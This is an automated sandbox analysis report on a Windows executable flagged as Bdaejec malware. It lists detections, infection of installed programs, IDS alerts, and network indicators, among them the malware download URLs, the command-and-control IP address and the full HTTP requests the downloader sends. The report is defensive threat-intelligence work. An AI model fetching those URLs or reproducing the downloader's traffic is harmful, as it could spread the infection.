Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
8VB4lVuZk3.exe

Overview

General Information

Sample name:8VB4lVuZk3.exe
renamed because original name is a hash value
Original sample name:BF6EE92CF97D4193943CD99DE27B17C4DBD27885CC0A3152B32D2CD97CFFB873.exe
Analysis ID:1480762
MD5:51309d30f3fb3295fea0b6d3084c4d26
SHA1:86601e2b6b32ee19c3072221c75ac009165226b7
SHA256:bf6ee92cf97d4193943cd99de27b17c4dbd27885cc0a3152b32d2cd97cffb873
Tags:exe
Infos:

Detection

Bdaejec
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Yara detected Bdaejec
AI detected suspicious sample
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64
  • 8VB4lVuZk3.exe (PID: 6464 cmdline: "C:\Users\user\Desktop\8VB4lVuZk3.exe" MD5: 51309D30F3FB3295FEA0B6D3084C4D26)
    • XFAGWZ.exe (PID: 5356 cmdline: C:\Users\user\AppData\Local\Temp\XFAGWZ.exe MD5: 56B2C3810DBA2E939A8BB9FA36D3CF96)
      • WerFault.exe (PID: 7288 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 1224 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: XFAGWZ.exe PID: 5356JoeSecurity_BdaejecYara detected BdaejecJoe Security
    No Sigma rule has matched
    No Snort rule has matched
    Timestamp:2024-07-24T23:49:20.932540+0200
    SID:2022930
    Source Port:443
    Destination Port:49741
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-07-24T23:49:03.660681+0200
    SID:2807908
    Source Port:49730
    Destination Port:799
    Protocol:TCP
    Classtype:Malware Command and Control Activity Detected
    Timestamp:2024-07-24T23:49:08.723751+0200
    SID:2807908
    Source Port:49731
    Destination Port:799
    Protocol:TCP
    Classtype:Malware Command and Control Activity Detected
    Timestamp:2024-07-24T23:49:23.114028+0200
    SID:2028371
    Source Port:49743
    Destination Port:443
    Protocol:TCP
    Classtype:Unknown Traffic
    Timestamp:2024-07-24T23:49:58.296193+0200
    SID:2022930
    Source Port:443
    Destination Port:49744
    Protocol:TCP
    Classtype:A Network Trojan was detected
    Timestamp:2024-07-24T23:49:02.882461+0200
    SID:2838522
    Source Port:55441
    Destination Port:53
    Protocol:UDP
    Classtype:Malware Command and Control Activity Detected

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: 8VB4lVuZk3.exeAvira: detected
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarURL Reputation: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rarURL Reputation: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarX(3Avira URL Cloud: Label: phishing
    Source: http://ddos.dnsnb8.net/;Avira URL Cloud: Label: phishing
    Source: http://ddos.dnsnb8.net/URL Reputation: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarJAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarXAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net/XKAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k1.rar=zPAvira URL Cloud: Label: malware
    Source: http://ddos.dnsnb8.net:799/cj//k2.rarpAvira URL Cloud: Label: phishing
    Source: http://ddos.dnsnb8.net:799/cj//k2.rardAvira URL Cloud: Label: malware
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeAvira: detection malicious, Label: TR/Dldr.Small.Z.haljq
    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Program Files\7-Zip\Uninstall.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeAvira: detection malicious, Label: W32/Jadtre.B
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeJoe Sandbox ML: detected
    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
    Source: C:\Program Files\7-Zip\Uninstall.exeJoe Sandbox ML: detected
    Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJoe Sandbox ML: detected
    Source: 8VB4lVuZk3.exeJoe Sandbox ML: detected
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6C8DFE80 e2ee_RSAPublicDecrypt,0_2_6C8DFE80
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6C8DEFB0 e2ee_cryptoHASH,0_2_6C8DEFB0
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6C8DEF70 e2ee_cryptoCreator,0_2_6C8DEF70
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6C8DF880 e2ee_cryptoGetCryptoCommon,0_2_6C8DF880
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6C8DFBF0 e2ee_RSAPublicEncrypt,0_2_6C8DFBF0
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6C8DF630 e2ee_cryptoDecrypt,0_2_6C8DF630
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6C8DF180 e2ee_cryptoHMAC,0_2_6C8DF180
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6C8E0110 e2ee_RSAPrivateEncrypt,0_2_6C8E0110
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6C8E03A0 e2ee_RSAPrivateDecrypt,0_2_6C8E03A0
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6C8DF3E0 e2ee_cryptoEncrypt,0_2_6C8DF3E0
    Source: 8VB4lVuZk3.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
    Source: 8VB4lVuZk3.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: Binary string: C:\Program Files (x86)\e\lib\e2ee.pdb source: 8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.dr
    Source: Binary string: -C:\Program Files (x86)\e\lib\e2ee.pdbxw source: 8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.dr
    Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

    Spreading

    barindex
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeCode function: 1_2_006B29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_006B29E2
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeCode function: 1_2_006B2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_006B2B8C
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

    Networking

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 799
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 799
    Source: global trafficTCP traffic: 192.168.2.4:49730 -> 44.221.84.105:799
    Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
    Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6C8FE380 e2ee_httpclientGetTimeoutRecv,0_2_6C8FE380
    Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
    Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
    Source: XFAGWZ.exe, 00000001.00000002.1891999307.00000000006B3000.00000002.00000001.01000000.00000004.sdmp, XFAGWZ.exe, 00000001.00000003.1685039072.0000000000F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
    Source: 8VB4lVuZk3.exe, E2EECore.2.7.2.dll.0.drString found in binary or memory: http://127.0.0.1/list
    Source: 8VB4lVuZk3.exe, E2EECore.2.7.2.dll.0.drString found in binary or memory: http://127.0.0.1:8984/solr/e2ee
    Source: 8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drString found in binary or memory: http://count.jimstone.com.cn/api/v1/countSite?api_version=1.0
    Source: 8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drString found in binary or memory: http://count.jimstone.com.cn/api/v1/countSite?api_version=1.0SELECT
    Source: XFAGWZ.exe, 00000001.00000003.1696071280.00000000011A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/
    Source: XFAGWZ.exe, 00000001.00000003.1696071280.00000000011A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/;
    Source: XFAGWZ.exe, 00000001.00000003.1696071280.00000000011A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/XK
    Source: XFAGWZ.exe, 00000001.00000003.1695679866.00000000011D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
    Source: XFAGWZ.exe, 00000001.00000002.1892621904.000000000116E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar=zP
    Source: XFAGWZ.exe, 00000001.00000003.1696181458.00000000011E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarcC:
    Source: XFAGWZ.exe, 00000001.00000002.1892621904.00000000011C9000.00000004.00000020.00020000.00000000.sdmp, XFAGWZ.exe, 00000001.00000002.1893600310.0000000002BFA000.00000004.00000010.00020000.00000000.sdmp, XFAGWZ.exe, 00000001.00000002.1892621904.0000000001209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
    Source: XFAGWZ.exe, 00000001.00000002.1892621904.00000000011C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarJ
    Source: XFAGWZ.exe, 00000001.00000002.1892621904.00000000011C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarX
    Source: XFAGWZ.exe, 00000001.00000002.1892621904.0000000001209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarX(3
    Source: XFAGWZ.exe, 00000001.00000002.1892621904.0000000001209000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rard
    Source: XFAGWZ.exe, 00000001.00000002.1893600310.0000000002BFA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarp
    Source: E2EECore.2.7.2.dll.0.drString found in binary or memory: http://e2ee.jimstone.com.cn
    Source: 8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drString found in binary or memory: http://e2ee.jimstone.com.cn/
    Source: E2EECore.2.7.2.dll.0.drString found in binary or memory: http://e2ee.jimstone.com.cn;http://e2ee.jimstone.com.cn:8000;http://e2ee2.jimstone.com.cn:8000;http:
    Source: 8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drString found in binary or memory: http://e2ee.jimstone.com.cninformationen_US
    Source: 8VB4lVuZk3.exe, E2EECore.2.7.2.dll.0.drString found in binary or memory: http://e2eeE.com:8443
    Source: 8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drString found in binary or memory: http://eb.jimstone.com.cn
    Source: E2EECore.2.7.2.dll.0.drString found in binary or memory: http://schemas.xmlsoap.org/disco/scl/
    Source: E2EECore.2.7.2.dll.0.drString found in binary or memory: http://schemas.xmlsoap.org/disco/soap/
    Source: 8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: E2EECore.2.7.2.dll.0.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
    Source: 8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/xmlns:soapsoap:Bodyxmlns%Y-%m-%dT%H:%M:%S%02d:00
    Source: E2EECore.2.7.2.dll.0.drString found in binary or memory: http://schemas.xmlsoap.org/soap/http
    Source: 8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drString found in binary or memory: http://schemas.xmlsoap.org/wsdl-extensions/
    Source: 8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drString found in binary or memory: http://schemas.xmlsoap.org/wsdl-extensions/wrpchttp://schemas.xmlsoap.org/wsdl/rpc/soaphttp://schema
    Source: 8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drString found in binary or memory: http://schemas.xmlsoap.org/wsdl-instance/
    Source: E2EECore.2.7.2.dll.0.drString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: 8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drString found in binary or memory: http://schemas.xmlsoap.org/wsdl/http/
    Source: 8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drString found in binary or memory: http://schemas.xmlsoap.org/wsdl/mime/
    Source: 8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drString found in binary or memory: http://schemas.xmlsoap.org/wsdl/rpc/
    Source: 8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/
    Source: 8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drString found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
    Source: Amcache.hve.1.drString found in binary or memory: http://upx.sf.net
    Source: 8VB4lVuZk3.exeString found in binary or memory: http://vipapi.chadanwang.com/scalperEquityOrder/checkNewOrder
    Source: 8VB4lVuZk3.exeString found in binary or memory: http://vipapi.chadanwang.com/scalperEquityOrder/fetchOrder
    Source: 8VB4lVuZk3.exeString found in binary or memory: http://vipapi.chadanwang.com/scalperEquityOrder/fetchOrder&JSESSIONID=orderId=errorCode200
    Source: 8VB4lVuZk3.exeString found in binary or memory: http://vipapi.chadanwang.com/scalperEquityOrder/queryPool
    Source: 8VB4lVuZk3.exeString found in binary or memory: http://vipapi.chadanwang.com/scalperEquityOrder/queryPoolpageNum=1&pageSize=10&brand=4&JSESSIONID=da
    Source: 8VB4lVuZk3.exeString found in binary or memory: http://vipapi.chadanwang.com/user/getPublicKey
    Source: 8VB4lVuZk3.exeString found in binary or memory: http://vipapi.chadanwang.com/user/getPublicKeyuserNo=data
    Source: 8VB4lVuZk3.exeString found in binary or memory: http://vipapi.chadanwang.com/user/login
    Source: 8VB4lVuZk3.exeString found in binary or memory: http://vipapi.chadanwang.com/user/login&shareCode=&loginPwd=data.remarkerrorMsg5
    Source: 8VB4lVuZk3.exeString found in binary or memory: http://vipapi.chadanwang.com/user/userInfo
    Source: SciTE.exe.1.drString found in binary or memory: http://www.activestate.com
    Source: SciTE.exe.1.drString found in binary or memory: http://www.activestate.comHolger
    Source: SciTE.exe.1.drString found in binary or memory: http://www.baanboard.com
    Source: SciTE.exe.1.drString found in binary or memory: http://www.baanboard.comBrendon
    Source: E2EECore.2.7.2.dll.0.drString found in binary or memory: http://www.baidu.com
    Source: SciTE.exe.1.drString found in binary or memory: http://www.develop.com
    Source: SciTE.exe.1.drString found in binary or memory: http://www.develop.comDeepak
    Source: E2EECore.2.7.2.dll.0.drString found in binary or memory: http://www.jimstone.com.cn/
    Source: 8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drString found in binary or memory: http://www.jimstone.com.cn/Location
    Source: E2EECore.2.7.2.dll.0.drString found in binary or memory: http://www.jimstone.com.cn/e2ee/docs/
    Source: 8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drString found in binary or memory: http://www.jimstone.com.cn/english/
    Source: 8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drString found in binary or memory: http://www.jimstone.com.cn/english/Referer
    Source: 8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drString found in binary or memory: http://www.jimstone.com.cn/refresh
    Source: SciTE.exe.1.drString found in binary or memory: http://www.lua.org
    Source: E2EECore.2.7.2.dll.0.drString found in binary or memory: http://www.openssl.org/support/faq.html
    Source: SciTE.exe.1.drString found in binary or memory: http://www.rftp.com
    Source: SciTE.exe.1.drString found in binary or memory: http://www.rftp.comJosiah
    Source: SciTE.exe.1.drString found in binary or memory: http://www.scintilla.org
    Source: SciTE.exe.1.drString found in binary or memory: http://www.scintilla.org/scite.rng
    Source: SciTE.exe.1.drString found in binary or memory: http://www.spaceblue.com
    Source: SciTE.exe.1.drString found in binary or memory: http://www.spaceblue.comMathias
    Source: 8VB4lVuZk3.exe, E2EECore.2.7.2.dll.0.drString found in binary or memory: http://www.w3school.com.cn/cssref/css_selectors.asp
    Source: 8VB4lVuZk3.exe, E2EECore.2.7.2.dll.0.drString found in binary or memory: http://www.w3school.com.cn/json/json_syntax.asp
    Source: 8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmp, 8VB4lVuZk3.exe, 00000000.00000002.2943702385.000000006CD00000.00000002.00000001.01000000.00000007.sdmp, E2EECore.2.7.2.dll.0.drString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
    Source: XFAGWZ.exe, 00000001.00000002.1892621904.00000000011C9000.00000004.00000020.00020000.00000000.sdmp, XFAGWZ.exe, 00000001.00000003.1696181458.00000000011E0000.00000004.00000020.00020000.00000000.sdmp, XFAGWZ.exe, 00000001.00000003.1695679866.00000000011D1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com#zQ
    Source: SciTE.exe.1.drString found in binary or memory: https://www.smartsharesystems.com/
    Source: SciTE.exe.1.drString found in binary or memory: https://www.smartsharesystems.com/Morten
    Source: SciTE.exe.1.drBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_f9ecea49-2

    System Summary

    barindex
    Source: MyProg.exe.1.drStatic PE information: section name: Y|uR
    Source: XFAGWZ.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6C86ED900_2_6C86ED90
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6C93AE100_2_6C93AE10
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6C8708E00_2_6C8708E0
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6C9098300_2_6C909830
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6CC029600_2_6CC02960
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: 0_2_6C9824500_2_6C982450
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeCode function: 1_2_006B60761_2_006B6076
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeCode function: 1_2_006B6D001_2_006B6D00
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\E2EECore.2.7.2.dll 982A177924762F270B36FE34C7D6847392B48AE53151DC2011078DCEEF487A53
    Source: C:\Users\user\Desktop\8VB4lVuZk3.exeCode function: String function: 6CC03A36 appears 35 times
    Source: C:\Users\user\AppData\Local\Temp\XFAGWZ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5356 -s 1224
    Source: MyProg.exe.1.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
    Source: 8VB4lVuZk3.exe, 00000000.00000003.1692440298.0000000003147000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameE2EECore.dll@ vs 8VB4lVuZk3.exe
    Source: 8VB4lVuZk3.exe, 00000000.00000002.2944368391.000000006D00F000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenameE2EECore.dll@ vs 8VB4lVuZk3.exe
    Source: 8VB4lVuZk3.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: XFAGWZ.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
    Source: XFAGWZ.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
